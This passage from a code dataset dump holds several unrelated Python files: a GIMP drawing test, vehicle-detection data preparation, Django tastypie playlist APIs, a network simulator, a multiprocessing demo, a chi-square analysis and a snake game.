Winman, Aux\nfrom subprocess import call\nimport sys\nfrom math import sqrt\n\nx,y = Aux.displayinfo()\n\nif not Winman.spinfocus(\"GNU Image Manipulation Program\", 60):\n print(\"Window not acquired.\")\n sys.exit(-1)\n\n# \ncall([\"notify-send\", \"Hands off the keyboard. The test begins in 3 seconds.\"])\nAux.wait(3, \"s\")\n\nprint(\"Debug info:\")\nprint(\"Making a new canvas.\")\nKeyboard.keycombo([\"Control_L\"], \"n\")\n\nif not Winman.spinfocus(\"New Image\"):\n sys.exit(1)\nKeyboard.keycombo([\"Alt_L\"], \"w\")\nKeyboard.typestring(\"500\")\nKeyboard.keycombo([\"Alt_L\"], \"e\")\nKeyboard.typestring(\"550\")\nKeyboard.hitkey(\"Return\")\n\nprint(\"Setting up canvas:\")\nif not Winman.spinfocus(\"500x550\"):\n sys.exit(2)\nKeyboard.hitkey(\"F11\")\nKeyboard.hitkey(\"1\")\nMouse.move(x/2, y/2)\n# Normalize screen bounds:\nMouse.click(5)\nMouse.click(4)\nKeyboard.keydown(\"Shift_L\")\nMouse.click(5)\nMouse.click(4)\nKeyboard.keyup(\"Shift_L\")\n\nprint(\"Drawing a smile.\")\n# At this point, mouse should be at 259,251 on canvas\nKeyboard.hitkey(\"p\")\nfor i in range(5):\n Keyboard.hitkey(\"]\")\n# Left eye: 158,172\nMouse.rclick(158-259, 172-251)\n# Right eye: 354,181\nMouse.rclick(354-158, 181-172)\n# Smile: Arc from 100,328 to 389,328\nMouse.rmove(100-354, 328-181)\ncurx,cury = Mouse.getmousepos()\nsave=(curx, cury)\nMouse.clickhold()\nfor i in range(0,151):\n Mouse.move(curx+i, cury+sqrt(11*i/2))\nfor i in range(151, 300):\n Mouse.move(curx+i, cury+sqrt(11*(300-i)/2))\nMouse.clickunhold()\nfor i in range(5):\n Keyboard.hitkey(\"[\")\n# Text at 171,461\nprint(\"Drawing message.\")\nMouse.move(save[0], save[1])\nKeyboard.hitkey(\"t\")\nMouse.rclick(80, 100)\nKeyboard.typestring(\"Have a nice day.\")\nKeyboard.hitkey(\"Escape\")\nKeyboard.keycombo([\"Alt_L\"], \"l\")\nKeyboard.hitkey(\"w\")\n\nKeyboard.hitkey(\"F11\")\n# Give it time:\nAux.wait(200)\n# Normalize screen bounds:\nMouse.click(5)\nMouse.click(5)\nMouse.click(4)\nMouse.click(4)\nKeyboard.keydown(\"Shift_L\")\nMouse.click(5)\nMouse.click(5)\nMouse.click(4)\nMouse.click(4)\nKeyboard.keyup(\"Shift_L\")\n\nWinman.focuson(\"python unit_tester.py\")\n\ncall([\"notify-send\", \"Test complete.\"])\n","sub_path":"samples/draw_tester.py","file_name":"draw_tester.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"563879745","text":"import glob\nimport pickle\nimport os\nfrom helper_functions import *\nfrom data_structure import *\n\n### TODO: Tweak these parameters and see how the results change.\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = 'ALL' # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (16, 16) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\ny_start_stop = [None, None] # Min and max in y to search in slide_window()\nhist_range=(0, 256)\n\ndef readData(pickle_file = 'data_images_features.p'):\n\n # files\n cars = glob.glob('./vehicles/GTI_Far/*.png')\n cars += glob.glob('./vehicles/GTI_MiddleClose/*.png')\n cars += glob.glob('./vehicles/GTI_Left/*.png')\n cars += glob.glob('./vehicles/GTI_Right/*.png')\n cars += glob.glob('./vehicles/KITTI_extracted/*.png')\n not_cars = glob.glob('./non-vehicles/Extras/*.png')\n not_cars += glob.glob('./non-vehicles/GTI/*.png')\n\n # get features (shuffled, separate into train/test and normalized features)\n # extract combined color and HOG features\n examples_features = extract_features(cars, cspace=color_space, spatial_size=spatial_size, hist_bins=hist_bins, hist_range=hist_range, orient=orient,\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, hog_channel=hog_channel)\n\n not_examples_features = extract_features(not_cars, cspace=color_space, spatial_size=spatial_size, hist_bins=hist_bins, hist_range=hist_range, orient=orient,\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, hog_channel=hog_channel)\n\n # Save the data for easy access\n print('Saving data to pickle file...')\n try:\n with open(pickle_file, 'wb') as pfile:\n pickle.dump(\n {\n 'cars': cars,\n 'not_cars': not_cars,\n 'examples_features': examples_features,\n 'not_examples_features': not_examples_features,\n 'color_space': color_space,\n 'orient': orient,\n 'pix_per_cell': pix_per_cell,\n 'cell_per_block': cell_per_block,\n 'hog_channel': hog_channel,\n 'spatial_size': spatial_size,\n 'hist_bins': hist_bins,\n 'spatial_feat': spatial_feat,\n 'hist_feat': hist_feat,\n 'hog_feat': hog_feat,\n 'y_start_stop': y_start_stop,\n 'hist_range': hist_range\n },\n pfile, pickle.HIGHEST_PROTOCOL)\n except Exception as e:\n print('Unable to save data to', pickle_file, ':', e)\n raise\n\n print('Data cached in pickle file.')\n\n return cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range\n\ndef loadData(data_file = 'data_images_features.p'):\n with open(data_file, mode='rb') as f:\n data = pickle.load(f)\n cars = data['cars']\n not_cars = data['not_cars']\n examples_features = data['examples_features']\n not_examples_features = data['not_examples_features']\n color_space = data['color_space']\n orient = data['orient']\n pix_per_cell = data['pix_per_cell']\n cell_per_block = data['cell_per_block']\n hog_channel = data['hog_channel']\n spatial_size = data['spatial_size']\n hist_bins = data['hist_bins']\n spatial_feat = data['spatial_feat']\n hist_feat = data['hist_feat']\n hog_feat = data['hog_feat']\n y_start_stop = data['y_start_stop']\n hist_range = data['hist_range']\n\n return cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range\n\ndef setup(f = './data_images_features.p'):\n # load data\n if (os.path.exists(f)):\n cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range = loadData(f)\n else:\n cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range = readData(f)\n\n features_train, features_test, labels_train, labels_test, X_scaler = norm_shuffle(cars, not_cars, examples_features, not_examples_features)\n\n data = dataStructure(features_train, features_test, labels_train, labels_test, X_scaler, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range)\n\n # train\n # color, spatial: Test Accuracy of SVC = 0.9181, 0.01135 Seconds to predict 10 labels with SVC\n # color, spatial, hog0: Test Accuracy of SVC = 0.9716, 0.01754 Seconds to predict 10 labels with SVC\n # color, spatial, hogAll: Test Accuracy of SVC = 0.9797, 0.0286 Seconds to predict 10 labels with SVC\n clf = train_SVM_LinearSVC(data, True)\n\n # color, spatial: Test Accuracy of DT = 0.9077, 0.01928 Seconds to predict 10 labels with DT\n # color, spatial, hog0: Test Accuracy of DT = 0.9223, 0.03695 Seconds to predict 10 labels with DT\n # color, spatial, hogAll: Test Accuracy of DT = 0.92, 0.05914 Seconds to predict 10 labels with DT\n #clf = train_decision_tree(data, True)\n\n return clf, data\n\nif __name__ == \"__main__\":\n f = data_file = 'data_images_features.p'\n if(os.path.exists(f)):\n cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range = loadData(f)\n else:\n cars, not_cars, examples_features, not_examples_features, color_space, orient, pix_per_cell, cell_per_block, hog_channel, spatial_size, hist_bins, spatial_feat, hist_feat, hog_feat, y_start_stop, hist_range = readData(f)\n\n print('Number of samples of cars: ', len(examples_features))\n print('Number of samples of not cars: ',len(not_examples_features))\n","sub_path":"process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"624974676","text":"from django.conf.urls import url\nfrom django.utils.text import slugify\nfrom tastypie import resources, fields\nfrom tastypie.authentication import Authentication\nfrom tastypie.authorization import Authorization\nfrom tastypie.exceptions import BadRequest\n\nfrom .adapters import parse_url, InvalidNetworkUrl, NetworkNotSupported\nfrom .models import Playlist, PlaylistItem\nfrom .utils import randhash\n\n\nclass PlaylistResource(resources.ModelResource):\n class Meta:\n authentication = Authentication()\n authorization = Authorization()\n queryset = Playlist.objects.all()\n resource_name = 'playlists'\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post', ]\n always_return_data = True\n filtering = {\n \"slug\": resources.ALL,\n \"token\": resources.ALL\n }\n\n def hydrate(self, bundle):\n if not bundle.obj.pk:\n bundle.data[\"id\"] = randhash()\n bundle.data[\"token\"] = randhash(30)\n return bundle\n\n def hydrate_slug(self, bundle):\n bundle.data[\"slug\"] = slugify(bundle.data[\"name\"])\n return bundle\n\n\nclass PlaylistItemResource(resources.ModelResource):\n playlist_id = fields.ForeignKey(PlaylistResource, 'playlist')\n\n class Meta:\n authentication = Authentication()\n authorization = Authorization()\n queryset = PlaylistItem.objects.all()\n list_allowed_methods = ['get', 'post']\n detail_allowed_methods = ['get', 'post', ]\n resource_name = 'playlist-items'\n filtering = {\n \"playlist_id\": resources.ALL_WITH_RELATIONS\n }\n ordering = [\"created_at\"]\n always_return_data = True\n\n def hydrate(self, bundle):\n if not bundle.obj.pk: # creation\n try:\n tid, title, url, network = parse_url(bundle.data[\"url\"])\n except KeyError:\n raise BadRequest(\"Missing url key in data.\")\n except (InvalidNetworkUrl, NetworkNotSupported) as e:\n raise BadRequest(e)\n\n bundle.data[\"network_id\"] = tid\n bundle.data[\"title\"] = title\n bundle.data[\"url\"] = url\n bundle.data[\"network\"] = network\n return bundle\n\n def base_urls(self):\n \"\"\"\n Override the base urls to have the playlist id directly.\n \"\"\"\n return [\n url(\n r\"^playlists/(?P\\w+)/(?P%s)/$\" % self._meta.resource_name,\n self.wrap_view('dispatch_list'),\n name=\"api_dispatch_list\"\n ),\n url(\n r\"^playlists/(?P\\w+)/(?P%s)/(?P\\d+)$\" % self._meta.resource_name,\n self.wrap_view('dispatch_detail'),\n name=\"api_dispatch_detail\"\n )\n ]\n","sub_path":"ourplaylists/app/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"501527331","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom simulator.file_parser import FileParser\nfrom simulator.network.arp_packet import ArpReply, ArpRequest\nfrom simulator.network.echo_packet import EchoReply, EchoRequest\n\n\nclass Simulator:\n def __init__(self, filename):\n parser = FileParser(self, filename)\n self.routers, self.mac_dict = parser.parse_file()\n\n def find_node(self, node_name):\n for router in self.routers:\n for port in router.ports:\n for connected in port.connected:\n if connected.name == node_name:\n return connected\n return None\n\n def connect(self, node_list):\n for i in range(0, len(node_list)-1):\n source = self.find_node(node_list[i])\n destination = self.find_node(node_list[i+1])\n if source is None:\n raise Exception(\"Node {name} not found\".format(name=node_list[i]))\n if destination is None:\n raise Exception(\"Node {name} not found\".format(name=node_list[i+1]))\n source.echo_request(destination.ip_address.ip)\n\n def parse_command(self, command):\n if isinstance(command, EchoRequest):\n if command.ttl == 0:\n exit(1)\n result = command.__str__().replace(\"src_host\", self.mac_dict[command.src_mac])\n if command.dst_mac is not None:\n result = result.__str__().replace(\"dst_host\", self.mac_dict[command.dst_mac])\n print(result)\n\nsim = Simulator(sys.argv[1])\nsim.connect(sys.argv[2:])\n\n\n\n\n\n\n\n","sub_path":"simulator/net_simulator.py","file_name":"net_simulator.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"14510603","text":"import multiprocessing\nfrom multiprocessing import Lock\nimport random\n# Py3\n\n\ndef detect_lost_number(n):\n if n in [4, 6, 15, 16, 23, 42]:\n print(\"%d is valid\" % (n,))\n else:\n print(\"Received %d\" % (n,))\n return n\n\n\ndef generate_random_number():\n number = random.choice(range(100))\n return number\n\n\ndef detector_process(pipe_conn, lock):\n # Receives n and evaluates it\n while True:\n n = pipe_conn.recv()\n detect_lost_number(n)\n lock.release()\n\n\ndef generator_process(pipe_conn, lock):\n while True:\n lock.acquire()\n n = generate_random_number()\n print(\"Sending %d\" % (n, ))\n pipe_conn.send(n)\n\n\ndef main():\n lock = Lock() # syncrhonize processes\n parent_conn, child_conn = multiprocessing.Pipe()\n generator = multiprocessing.Process(target=generator_process,\n args=(child_conn, lock, ))\n detector = multiprocessing.Process(target=detector_process,\n args=(parent_conn, lock, ))\n generator.start()\n detector.start()\n generator.join()\n detector.join()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ipc/detecting_numbers.py","file_name":"detecting_numbers.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"407727522","text":"# Problem Statement\r\n'''\r\nTeleCall uses 4 centers around the globe to process customer order forms. \r\nThey audit a certain % of the customer order forms. Any error in order form renders it defective and has to be reworked before processing. \r\nThe manager wants to check whether the defective % varies by centre. \r\nPlease analyze the data at 5% significance level and help the manager draw appropriate inferences\r\n'''\r\n\r\n# Solution\r\nalpha = 0.05 # From the problem statement\r\n\r\n# Importing necessary libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy import stats\r\n\r\n# Load the Costomer+OrderForm.csv as pandas dataframe\r\nCustOrderForm = pd.read_csv('Costomer+OrderForm.csv')\r\n\r\n#View Data\r\nprint(CustOrderForm.head())\r\n\r\n# print(CustOrderForm.describe())\r\n\r\n# Shape of dataframe\r\nprint(CustOrderForm.shape) # 300 rows and 4 columns\r\n\r\nfor columnName, columnData in CustOrderForm.iteritems():\r\n\tprint('\\n'+\"Value counts of column {}\".format(columnName))\r\n\tprint(columnData.value_counts())\r\n\r\n\r\n# Defining our Null, Alternate Hypothesis\r\nHo = 'Defective % across the centers is same'\r\nHa = 'Defective % across the centres is not same'\r\ndef chi_square(df):\r\n\terrorFree = [271, 267, 269, 280]\r\n\tDefective = [29,33, 31, 20]\r\n\ttable = [errorFree, Defective]\r\n\t# print(table)\r\n\r\n\tstat, p, dof, expected = stats.chi2_contingency(table)\r\n\t# print(test)\r\n\tp = round(p, 2)\r\n\r\n\tprint('\\n'+\"Inference from P Value\")\r\n\tif p>alpha:\r\n\t\tprint(\"{p} is greater than {alpha}. We fail to reject Null Hypothesis. {Ho}\".format(p=p, alpha=alpha, Ho=Ho))\r\n\telse:\r\n\t\tprint(\"{p} less than {alpha}. We reject Null Hypothesis. {Ha}\".format(p=p, alpha=alpha, Ha=Ha))\r\n\r\n\t# If p<=alpha, reject Ho. Hence, there is a relation between the two categorical variables\r\n\t# else, retain Ho. Hence, there is no relation between the two categorical variables \r\n\r\n\tHnull = 'There is no relation between the categorical variables'\r\n\tHalt = 'There is a relation between the categorical variables'\r\n\t# Computing the critical values\r\n\tcritical = stats.chi2.ppf(q=1-alpha, df=dof)\r\n\t\r\n\tprint('\\n'+\"Inference from Critical Value\")\r\n\r\n\tif critical>stat:\r\n\t\tprint(\"{critical} is greater than {stat}. We fail to reject Null Hypothesis. {Hnull}\".format(critical=round(critical,2), stat=round(stat, 2), Hnull=Hnull))\r\n\telse:\r\n\t\tprint(\"{critical} less than {stat}. We reject Null Hypothesis. {Halt}\".format(critical=round(critical,2), stat=round(stat, 2), Halt=Halt))\r\n\r\n\t# If critical<=stat, reject Ho. Hence, there is a relation between the two categorical variables\r\n\t# else, retain Ho. Hence, there is no relation between the two categorical variables \r\n\r\nchi_square(CustOrderForm)","sub_path":"Customer+OrderForm.py","file_name":"Customer+OrderForm.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"128176119","text":"#!/usr/bin/env python\r\nfrom queue import Queue\r\nimport pygame\r\nimport sys\r\nimport time\r\nimport random\r\n\r\n\r\ndx = [0,0,-10,10]\r\ndy = [10,-10,0,0]\r\n\r\nfrom pygame.locals import *\r\n\r\nFPS = 50\r\npygame.init()\r\nfpsClock=pygame.time.Clock()\r\n\r\nSCREEN_WIDTH, SCREEN_HEIGHT = 640, 480\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0, 32)\r\nsurface = pygame.Surface(screen.get_size())\r\nsurface = surface.convert()\r\nsurface.fill((255,255,255))\r\nclock = pygame.time.Clock()\r\n\r\npygame.key.set_repeat(1, 40)\r\n\r\nGRIDSIZE=10\r\nGRID_WIDTH = SCREEN_WIDTH / GRIDSIZE\r\nGRID_HEIGHT = SCREEN_HEIGHT / GRIDSIZE\r\nUP = (0, -1)\r\nDOWN = (0, 1)\r\nLEFT = (-1, 0)\r\nRIGHT = (1, 0)\r\n \r\nscreen.blit(surface, (0,0))\r\n\r\ndef draw_box(surf, color, pos):\r\n r = pygame.Rect((pos[0], pos[1]), (GRIDSIZE, GRIDSIZE))\r\n pygame.draw.rect(surf, color, r)\r\n\r\n \r\n\r\nclass Snake(object):\r\n def __init__(self):\r\n self.lose()\r\n self.color = (0,0,0)\r\n\r\n def get_head_position(self):\r\n return self.positions[0]\r\n\r\n def lose(self):\r\n self.length = 1\r\n self.positions = [((SCREEN_WIDTH / 2), (SCREEN_HEIGHT / 2))]\r\n self.direction = random.choice([UP, DOWN, LEFT, RIGHT])\r\n\r\n def point(self, pt):\r\n if self.length > 1 and (pt[0] * -1, pt[1] * -1) == self.direction:\r\n return\r\n else:\r\n self.direction = pt\r\n #def buscaApple(self, Apple_position):\r\n \r\n\r\n def move(self):\r\n cur = self.positions[0]\r\n x, y = self.direction\r\n new = (((cur[0]+(x*GRIDSIZE)) % SCREEN_WIDTH), (cur[1]+(y*GRIDSIZE)) % SCREEN_HEIGHT)\r\n if len(self.positions) > 2 and new in self.positions[2:]:\r\n self.lose()\r\n else:\r\n self.positions.insert(0, new)\r\n if len(self.positions) > self.length:\r\n self.positions.pop()\r\n \r\n def draw(self, surf):\r\n for p in self.positions:\r\n draw_box(surf, self.color, p)\r\n\r\nclass Apple(object):\r\n def __init__(self):\r\n self.position = (0,0)\r\n self.color = (255,0,0)\r\n self.randomize()\r\n\r\n def randomize(self):\r\n self.position = (random.randint(0, GRID_WIDTH-1) * GRIDSIZE, random.randint(0, GRID_HEIGHT-1) * GRIDSIZE)\r\n\r\n def draw(self, surf):\r\n draw_box(surf, self.color, self.position)\r\n\r\ndef check_eat(snake, apple):\r\n if snake.get_head_position() == apple.position:\r\n snake.length += 1\r\n apple.randomize()\r\n \r\ndef bfs(snake, apple):\r\n fila = Queue.Queue()\r\n \r\n s1 = snake.positions[0][0]\r\n s2 = snake.positions[0][1]\r\n \r\n fila.put((s1,s2))\r\n \r\n visited = []\r\n pai = []\r\n \r\n for i in range(642):\r\n visited.append([0])\r\n pai.append([0])\r\n for j in range(482):\r\n visited[i].append(0)\r\n pai[i].append(())\r\n \r\n pai[s1][s2] = (-1,-1)\r\n \r\n while(not fila.empty()):\r\n topo = fila.get()\r\n \r\n \r\n v = topo[0]\r\n u = topo[1]\r\n \r\n if(visited[v][u]): continue\r\n \r\n visited[v][u] = 1\r\n \r\n for i in range(4):\r\n xx = v + dx[i]\r\n yy = u + dy[i]\r\n if(xx >= 0 and xx <=640 and yy >= 0 and yy <= 480 and (xx,yy)not in snake.positions and not visited[xx][yy]):\r\n fila.put((xx,yy))\r\n pai[xx][yy] = (v,u)\r\n \r\n \r\n a1 = apple.position[0]\r\n a2 = apple.position[1]\r\n cont = 0\r\n \r\n print(\"A cobra esta em %d %d\" %(s1,s2))\r\n print(\"A maca esta em %d %d\"%(a1,a2))\r\n\r\n while(True):\r\n \r\n if(a1 == -1 and a2 == -1): break\r\n \r\n print(str(a1) + \" \" + str(a2))\r\n aux = pai[a1][a2]\r\n cont += 1\r\n if cont > 100: break\r\n a1 = aux[0]\r\n a2 = aux[1]\r\n \r\n \r\n\r\nif __name__ == '__main__':\r\n snake = Snake()\r\n apple = Apple()\r\n while True:\r\n\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.type == KEYDOWN:\r\n if event.key == K_UP:\r\n snake.point(UP)\r\n elif event.key == K_DOWN:\r\n snake.point(DOWN)\r\n elif event.key == K_LEFT:\r\n snake.point(LEFT)\r\n elif event.key == K_RIGHT:\r\n snake.point(RIGHT)\r\n\r\n # bfs(snake,apple)\r\n surface.fill((255,255,255))\r\n # snake.buscaApple(apple.position)\r\n \r\n x1 = snake.positions[0][0]/10\r\n y1 = snake.positions[0][1]/10\r\n x2 = apple.position[0]/10\r\n y2 = apple.position[1]/10\r\n \r\n # print(str(x1) + \" \" + str(y1))\r\n # print(str(x2) + \" \" + str(y2))\r\n \r\n xx = x1 - x2\r\n yy = y1 - y2\r\n \r\n print(xx)\r\n print(yy)\r\n \r\n left = False\r\n up = False\r\n \r\n if yy > 0:\r\n up = True\r\n \r\n if xx > 0:\r\n left = True\r\n \r\n \r\n for i in range(abs(int(xx))):\r\n if left:\r\n snake.point(LEFT)\r\n \r\n else:\r\n snake.point(RIGHT)\r\n surface.fill((255,255,255))\r\n snake.move()\r\n check_eat(snake, apple)\r\n snake.draw(surface)\r\n apple.draw(surface)\r\n font = pygame.font.Font(None, 36)\r\n text = font.render(str(snake.length), 1, (10, 10, 10))\r\n textpos = text.get_rect()\r\n textpos.centerx = 20\r\n surface.blit(text, textpos)\r\n screen.blit(surface, (0,0))\r\n\r\n pygame.display.flip()\r\n pygame.display.update()\r\n fpsClock.tick(FPS + snake.length/3)\r\n \r\n for i in range(abs(int(yy))):\r\n if up:\r\n snake.point(UP)\r\n else:\r\n snake.point(DOWN)\r\n surface.fill((255,255,255))\r\n snake.move()\r\n check_eat(snake, apple)\r\n snake.draw(surface)\r\n apple.draw(surface)\r\n font = pygame.font.Font(None, 36)\r\n text = font.render(str(snake.length), 1, (10, 10, 10))\r\n textpos = text.get_rect()\r\n textpos.centerx = 20\r\n surface.blit(text, textpos)\r\n screen.blit(surface, (0,0))\r\n\r\n pygame.display.flip()\r\n pygame.display.update()\r\n fpsClock.tick(FPS + snake.length/3)\r\n \r\n ","sub_path":"Pygame/snakemanhattan.py","file_name":"snakemanhattan.py","file_ext":"py","file_size_in_byte":6513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}